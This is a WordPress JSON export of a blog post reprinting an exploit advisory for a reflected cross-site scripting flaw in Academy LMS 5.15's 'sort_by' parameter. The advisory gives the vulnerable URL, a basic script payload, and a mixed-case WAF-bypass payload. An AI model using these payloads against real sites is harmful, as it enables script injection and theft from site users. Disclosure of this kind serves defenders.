{"id":44819,"date":"2023-07-12T13:20:07","date_gmt":"2023-07-12T09:20:07","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173405\/academylms515-xss.txt"},"modified":"2023-07-19T14:26:23","modified_gmt":"2023-07-19T09:56:23","slug":"academy-lms-5-15-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/academy-lms-5-15-cross-site-scripting\/","title":{"rendered":"Academy LMS 5.15 Cross Site Scripting"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Academy LMS 5.15 &#8211; Reflected XSS<br \/>\n# Exploit Author: CraCkEr<br \/>\n# Date: 09\/07\/2023<br \/>\n# Vendor: Creativeitem<br \/>\n# Vendor Homepage: https:\/\/creativeitem.com\/<br \/>\n# Software Link: https:\/\/demo.creativeitem.com\/academy\/<br \/>\n# Tested on: Windows 10 Pro<br \/>\n# Impact: Manipulate the content of the site<\/p>\n<p dir=\"ltr\">## Description<\/p>\n<p dir=\"ltr\">Allow Attacker to inject malicious code into website, give ability to steal sensitive<br \/>\ninformation, manipulate data, and launch additional attacks.<\/p>\n<p dir=\"ltr\">Path: \/home\/courses<\/p>\n<p dir=\"ltr\">GET parameter &#8216;sort_by&#8217; is vulnerable to XSS<\/p>\n<p dir=\"ltr\">https:\/\/website\/home\/courses?category=photoshop&#038;price=all&#038;level=all&#038;language=all&#038;rating=all&#038;sort_by=[XSS]\n<p dir=\"ltr\">Simple XSS Payload (Blocked by WAF) : &lt;script&gt;alert(1)&lt;\/script&gt;<br \/>\nXSS Filter Bypass : ldt4d&#8221;&gt;&lt;ScRiPt&gt;alert(1)&lt;\/ScRiPt&gt;nuydd<\/p>\n<p dir=\"ltr\">[-] Done<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Academy LMS 5.15 &#8211; Reflected XSS # Exploit Author: CraCkEr # Date: 09\/07\/2023 # Vendor: Creativeitem # Vendor Homepage: https:\/\/creativeitem.com\/ # Software Link: https:\/\/demo.creativeitem.com\/academy\/ # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Description Allow Attacker to inject malicious code into website, give ability to steal &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-44819","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/44819","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=44819"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/44819\/revisions"}],"predecessor-version":[{"id":45115,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/44819\/revisions\/45115"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=44819"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=44819"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=44819"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}